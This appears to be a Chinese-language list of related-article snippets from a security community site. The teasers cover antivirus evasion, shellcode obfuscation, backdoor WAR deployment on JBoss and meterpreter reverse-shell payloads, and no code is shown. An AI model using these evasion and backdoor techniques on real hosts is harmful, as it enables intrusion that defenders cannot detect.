    PS:本文仅用于技术交流与分享,严禁用于非法用途 ? 一. 配置ngrok准备内网穿透 内网穿透的必要性和原理就不用说了,直接说操作。首先到ngrok官网去注册...

    FB客服
  • 免杀 - shellcode简单混淆BypassAv

    在进行渗透测试过程中,往往会遇到主机有杀软,导致我们的木马被查杀,那么我们就得想办法绕过杀软进行上线Cobalt strike 或者 Metasploiit

    重生信息安全
  • 实战 | 记一次Bypass国外杀毒的主机渗透经历

    这个好,直接jboss,一般可先尝试弱口令后台部署war包,后门文件进行压缩,改名为“.war”:

    HACK学习
  • 简单的源码免杀过av

    经常看到各种免杀的例子,源码免杀、二进制免杀、加载器免杀等等,最近来学习了一下源码层面的免杀,在实验过程中与杀软对抗最终成功免杀,写下本文做个记录。

    Gcow安全团队
  • 恶意程序编写之免杀基础

    郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

    重生信息安全
  • 远控免杀专题(17)-Python-Rootkit免杀(VT免杀率7/69)

    2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。

    Ms08067安全实验室

扫码关注云+社区

领取腾讯云代金券